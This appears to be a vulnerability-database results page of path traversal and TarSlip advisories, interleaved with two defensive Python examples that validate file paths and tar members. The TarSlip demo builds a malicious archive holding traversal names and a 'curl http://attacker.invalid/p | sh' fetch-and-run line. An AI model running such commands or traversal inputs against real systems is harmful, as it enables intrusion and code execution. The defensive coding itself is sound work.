779 matches found

CNNVD
added 2024/06/27 12:00 a.m. · 4 views

Devika Security Vulnerability

Devika, from Stition.AI, is an AI software engineer that understands high-level human instructions, breaks them down into steps, researches the relevant information, and writes code to achieve a given goal. Devika has a security vulnerability that stems from allowing external control over...

CVSS 7.5 · AI score 7.1 · EPSS 0.02073
Exploits 1 · References 3

Veracode
added 2024/06/12 5:26 a.m. · 21 views

Path Traversal

lollms is vulnerable to Path Traversal. The vulnerability is due to improper validation of file paths between Windows and Linux environments, allowing attackers to traverse beyond the intended directory and read any file on the Windows system...

CVSS 7.5 · AI score 7 · EPSS 0.00881
Exploits 1 · References 2 · Affected Software 1

Github Security Blog
added 2024/06/06 9:30 p.m. · 20 views

LoLLMS Path Traversal vulnerability

A path traversal vulnerability exists in the parisneo/lollms application, affecting version 9.4.0 and potentially earlier versions, but fixed in version 9.5.0. The vulnerability arises due to improper validation of file paths between Windows and Linux environments, allowing attackers to traverse...

CVSS 7.5 · AI score 6.2 · EPSS 0.00881
Exploits 1 · References 4 · Affected Software 1

Vulnrichment
added 2024/06/06 6:40 p.m. · 18 views

CVE-2024-1873 Path Traversal and Denial of Service in parisneo/lollms-webui

parisneo/lollms-webui is vulnerable to path traversal and denial of service attacks due to an exposed /selectdatabase endpoint in version a9d16b0. The endpoint improperly handles file paths, allowing attackers to specify absolute paths when interacting with the DiscussionsDB instance. This flaw...

CVSS 8.2 · AI score 6.8 · EPSS 0.13389
Exploits 0 · References 1

Vulnrichment
added 2024/06/06 6:17 p.m. · 19 views

CVE-2024-4881 Path Traversal in parisneo/lollms

A path traversal vulnerability exists in the parisneo/lollms application, affecting version 9.4.0 and potentially earlier versions, but fixed in version 9.5.0. The vulnerability arises due to improper validation of file paths between Windows and Linux environments, allowing attackers to traverse...

CVSS 7.5 · AI score 6.3 · EPSS 0.00881
Exploits 1 · References 2

CVE
added 2024/06/06 6:17 p.m. · 54 views

CVE-2024-4881

CVE-2024-4881 is a path traversal vulnerability in the parisneo/lollms application. Multiple connected documents confirm the issue affects version 9.4.0 and potentially earlier builds, arising from inadequate sanitization of file paths containing backslashes across Windows/Linux contexts, enablin...

CVSS 7.5 · AI score 7.1 · EPSS 0.00881
Exploits 1 · References 2 · Affected Software 1

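The lollms entries above (CVE-2024-4881, CVE-2024-1873, CVE-2024-2362) share one root cause: a path check that is correct for one operating system's separator and wrong for the other, or that never considers an absolute path at all. The following is an added example, not code from lollms, lollms-webui or any project listed on this page. It places a naive check of that kind beside a containment check that treats both separators, drive letters and UNC prefixes as significant on any host and resolves symlinks before the final comparison. The base directory name and the candidate paths are constructed for the demo.

```python
"""Containment check for user-supplied relative paths that does not depend on
the host OS's separator.

Added example, not code from lollms, lollms-webui, gradio or langchain.
It models the bug class behind CVE-2024-4881, CVE-2024-1873 and CVE-2024-2362:
a check written with one OS's separator in mind lets '..\\' segments or an
absolute path through on the other. The base directory and candidate paths
used below are assumptions for the demo.
"""
from pathlib import Path, PureWindowsPath


def naive_is_safe(user_path: str) -> bool:
    """Typical failing check: splits on '/' only and ignores absolute paths.
    'subdir\\..\\..\\secret' passes here, and on a Windows host '\\' is a
    separator, so the traversal succeeds."""
    return ".." not in user_path.split("/")


def safe_join(base_dir: str, user_path: str) -> Path:
    """Return base_dir/user_path, or raise ValueError if user_path could leave base_dir.

    PureWindowsPath parses both '/' and '\\' as separators and recognises drive
    letters and UNC prefixes on any host, so it is used for the syntactic
    checks; the real host Path then resolves symlinks before the final test.
    """
    view = PureWindowsPath(user_path)
    if view.drive or view.root:      # 'C:x', '\\\\srv\\share\\x', '/etc/passwd', '\\x'
        raise ValueError(f"absolute or rooted path rejected: {user_path!r}")
    if any(part == ".." for part in view.parts):
        raise ValueError(f"parent traversal rejected: {user_path!r}")
    base = Path(base_dir).resolve()
    candidate = base.joinpath(*view.parts).resolve()   # follows existing symlinks
    if not candidate.is_relative_to(base):              # lexical test, so only valid after resolve()
        raise ValueError(f"path escapes base directory: {user_path!r}")
    return candidate


def classify(base_dir: str, user_paths: list[str]) -> dict[str, bool]:
    """Map each candidate to True (accepted) or False (rejected by safe_join)."""
    results: dict[str, bool] = {}
    for p in user_paths:
        try:
            safe_join(base_dir, p)
            results[p] = True
        except ValueError:
            results[p] = False
    return results


if __name__ == "__main__":
    # Constructed candidates: one legitimate, the rest traversal or absolute.
    cases = ["notes/a.txt", "subdir\\..\\..\\secret", "../../etc/passwd",
             "/etc/passwd", "C:\\Windows\\win.ini", "\\\\srv\\share\\x"]
    for p, ok in classify("/srv/app/data", cases).items():
        print(f"naive={naive_is_safe(p)!s:5} safe={ok!s:5} {p}")
```

On a POSIX host a filename that legitimately contains a backslash is rejected by this check; that is the intended trade-off for an application that, like lollms, may be deployed on either platform. Note that `Path.is_relative_to` compares path components lexically, which is why the code resolves both paths first.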
NVD
added 2024/06/06 6:15 p.m. · 43 views

CVE-2024-2914

A TarSlip vulnerability exists in the deepjavalibrary/djl, affecting version 0.26.0 and fixed in version 0.27.0. This vulnerability allows an attacker to manipulate file paths within tar archives to overwrite arbitrary files on the target system. Exploitation of this vulnerability could lead to...

CVSS 8.8 · EPSS 0.00917
Exploits 1 · References 2

CVE
added 2024/06/06 6:08 p.m. · 63 views

CVE-2024-2362

The CVE-2024-2362 entry concerns parisneo/lollms-webui version 9.3 on Windows, with a path traversal vulnerability in the del_preset endpoint due to inadequate input sanitization. The issue permits an attacker to delete files outside the intended directory by supplying absolute or traversal path...

CVSS 9.1 · AI score 9.2 · EPSS 0.0115
Exploits 1 · References 1 · Affected Software 1

CVE
added 2024/06/06 5:55 p.m. · 52 views

CVE-2024-2914

The CVE-2024-2914 TarSlip flaw affects the deepjavalibrary/djl project, with vulnerable version 0.26.0 and fixed in 0.27.0. Root cause: improper validation of tar entry file paths during extraction (as seen in files_util.py/extract_imagenet.py). Impact potential includes remote code execution, pr...

CVSS 8.8 · AI score 8.1 · EPSS 0.00917
Exploits 1 · References 2 · Affected Software 1

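The two CVE-2024-2914 entries above describe TarSlip: an extractor that joins the destination directory with each member name and writes, so a member named `../x` or `/x` lands outside the destination. The following is an added example, not code from deepjavalibrary/djl or its helper scripts. It shows where a naive join sends such members, then an extractor that validates every member (name syntax, link and special-file type, resolved location) before writing anything. The archive and its member names are constructed for the demo.

```python
"""TarSlip-safe extraction: every archive member is checked against the
destination before anything is written.

Added example, not code from deepjavalibrary/djl. It models the bug class in
CVE-2024-2914: an extractor that joins dest and the member name and writes,
so '../x' or '/x' entries land outside dest. The archive built here is
constructed for the demo; its member names are made up.
"""
import io
import os
import tarfile
import tempfile
from pathlib import Path, PureWindowsPath
from typing import Optional


def naive_target(dest_dir: str, member_name: str) -> str:
    """Where a naive extractor writes a member: os.path.join discards dest_dir
    entirely when member_name is absolute, and '..' is kept as written."""
    return os.path.normpath(os.path.join(dest_dir, member_name))


def member_problem(m: tarfile.TarInfo, dest: Path) -> Optional[str]:
    """Return a rejection reason, or None if the member may be written under dest."""
    if m.issym() or m.islnk():
        return "links are not extracted"       # a link could redirect later members
    if not (m.isfile() or m.isdir()):
        return "special file"                  # devices, fifos
    view = PureWindowsPath(m.name)             # treats '/' and '\\' as separators
    if view.drive or view.root:
        return "absolute path"
    if any(part == ".." for part in view.parts):
        return "parent traversal"
    target = dest.joinpath(*view.parts).resolve()   # resolves symlinks already in dest
    if not target.is_relative_to(dest):
        return "escapes destination"
    return None


def safe_extract(tar_bytes: bytes, dest_dir: str) -> tuple[list[str], list[str]]:
    """Extract regular files and directories from tar_bytes under dest_dir.
    Returns (extracted member names, 'name: reason' strings for rejected members)."""
    dest = Path(dest_dir).resolve()
    extracted: list[str] = []
    rejected: list[str] = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for m in tar.getmembers():
            reason = member_problem(m, dest)
            if reason is not None:
                rejected.append(f"{m.name}: {reason}")
                continue
            target = dest.joinpath(*PureWindowsPath(m.name).parts)
            if m.isdir():
                target.mkdir(parents=True, exist_ok=True)
            else:
                target.parent.mkdir(parents=True, exist_ok=True)
                with tar.extractfile(m) as src:
                    target.write_bytes(src.read())
            extracted.append(m.name)
    return extracted, rejected


def _add(tar: tarfile.TarFile, name: str, data: bytes) -> None:
    """Append a regular-file member with an arbitrary (unsanitised) name."""
    info = tarfile.TarInfo(name)
    info.size = len(data)
    tar.addfile(info, io.BytesIO(data))


def build_malicious_tar() -> bytes:
    """Constructed archive: one legitimate member and three TarSlip attempts."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        _add(tar, "model/weights.bin", b"\x00" * 16)
        _add(tar, "../../.bashrc", b"curl http://attacker.invalid/p | sh\n")
        link = tarfile.TarInfo("model/escape")          # symlink pointing outside dest
        link.type, link.linkname = tarfile.SYMTYPE, "/etc"
        tar.addfile(link)
        _add(tar, "/tmp/absolute.txt", b"abs")
    return buf.getvalue()


def demo() -> tuple[list[str], list[str]]:
    """Run the safe extractor against the constructed archive in a temp dir."""
    with tempfile.TemporaryDirectory() as d:
        return safe_extract(build_malicious_tar(), d)


if __name__ == "__main__":
    ok, bad = demo()
    print("extracted:", ok)
    for r in bad:
        print("rejected :", r)
```

Symlink and hard-link members are rejected outright rather than validated, because a link extracted earlier can redirect a later, syntactically clean member outside the destination. Python 3.12's `TarFile.extractall(..., filter="data")` (also backported to 3.8.17, 3.9.17, 3.10.12 and 3.11.4) enforces comparable rules; code that must run on older interpreters needs an explicit per-member check like the one above.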
GithubExploit
added 2024/06/05 3:37 p.m. · 390 views

Exploit for CVE-2024-4956

CVE-2024-4956 This repository contains a Python utility for a...

CVSS 7.5 · AI score 7.6 · EPSS 0.18245
Exploits 16

OSV
added 2024/06/04 9:51 a.m. · 22 views

BIT-NODE-2024-21890

The Node.js Permission Model does not clarify in the documentation that wildcards should be only used as the last character of a file path. For example: --allow-fs-read=/home/node/.ssh/*.pub will ignore pub and give access to everything after .ssh/. This misleading documentation affects all users...

CVSS 6.5 · AI score 6.9 · EPSS 0.00945
Exploits 0 · References 6

Tenable Nessus
added 2024/06/03 12:00 a.m. · 21 views

RHEL 4 : wpa_supplicant (Unpatched Vulnerability)

The remote Redhat Enterprise Linux 4 host has one or more packages installed that are affected by a vulnerability that has been acknowledged by the vendor but will not be patched. - NetworkManager, wpa_supplicant: Improper x509v3 certificate and key file paths sanitization (CVE-2012-1096). Note that...

CVSS 5.5 · AI score 6.3 · EPSS 0.0071
Exploits 0 · References 1

GithubExploit
added 2024/05/31 1:11 p.m. · 406 views

Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Checkpoint Quantum_Spark_Firmware

Check Point Security Gateway RCE Exploit Tool CVE-2024-249...

CVSS 8.6 · AI score 9.3 · EPSS 0.99978
Exploits 52

Veracode
added 2024/05/29 7:10 a.m. · 18 views

Path Traversal

org.openapitools, openapi-generator-online is vulnerable to a Path Traversal. The vulnerability is due to unrestricted access to the outputFolder option, which allows attackers to manipulate file paths and potentially read or delete files and folders outside of the intended directory...

CVSS 8.3 · AI score 6.6 · EPSS 0.03592
Exploits 0 · References 4 · Affected Software 1

Positive Technologies
added 2024/05/07 12:00 a.m. · 3 views

PT-2024-25515 · Logpoint · Logpoint

Name of the Vulnerable Software and Affected Versions: Logpoint versions prior to 7.4.0. Description: An issue was discovered that allows Local File Inclusion (LFI) when an arbitrary File Path is used within the File System Collector. The content of the file specified can be viewed in the incoming...

CVSS 6.5 · AI score 7.2 · EPSS 0.00446
Exploits 0 · References 4

AlmaLinux
added 2024/04/30 12:00 a.m. · 47 views

Moderate: squashfs-tools security update

SquashFS is a highly compressed read-only file system for Linux. These packages contain the utilities for manipulating squashfs file systems. Security Fixes: squashfs-tools: unvalidated filepaths allow writing outside of destination (CVE-2021-40153); squashfs-tools: possible Directory Traversal via...

CVSS 8.1 · AI score 7 · EPSS 0.025
Exploits 2 · References 6

OSV
added 2024/04/26 9:30 a.m. · 16 views

GHSA-VX97-8Q8Q-QGQ5 Mattermost's detailed error messages reveal the full file path

Mattermost versions 9.6.x <= 9.6.0, 9.5.x <= 9.5.2, 9.4.x <= 9.4.4 and 8.1.x <= 8.1.11 fail to remove detailed error messages in API requests even if the developer mode is off, which allows an attacker to get information about the server such as the full path where files are stored...

CVSS 4.3 · AI score 4.3 · EPSS 0.00452
Exploits 0 · References 7

Github Security Blog
added 2024/04/16 12:30 a.m. · 22 views

langchain vulnerable to path traversal

langchain-ai/langchain is vulnerable to path traversal due to improper limitation of a pathname to a restricted directory ('Path Traversal') in its LocalFileStore functionality. An attacker can leverage this vulnerability to read or write files anywhere on the filesystem, potentially leading to...

CVSS 8.8 · AI score 6.9 · EPSS 0.01856
Exploits 1 · References 4 · Affected Software 1

CVE
added 2024/04/16 12:00 a.m. · 57 views

CVE-2024-1961

CVE-2024-1961 affects the open-source project vertaai/modeldb. The vulnerability is a path traversal flaw caused by improper sanitization of user-supplied file paths in the file upload flow, specifically in the NFSController.java and NFSService.java components. Attackers can manipulate the artifa...

CVSS 8.8 · AI score 7.5 · EPSS 0.01034
Exploits 0 · References 1

Veracode
added 2024/04/12 10:13 a.m. · 18 views

Local File Inclusion (LFI)

gradio is vulnerable to Local File Inclusion. This vulnerability is due to improper validation of user-supplied input in the UploadButton component, specifically in the handling of file paths during file uploads to the /queue/join endpoint, which allows attackers to read arbitrary files on the...

CVSS 7.5 · AI score 7 · EPSS 0.85393
Exploits 2 · References 3 · Affected Software 1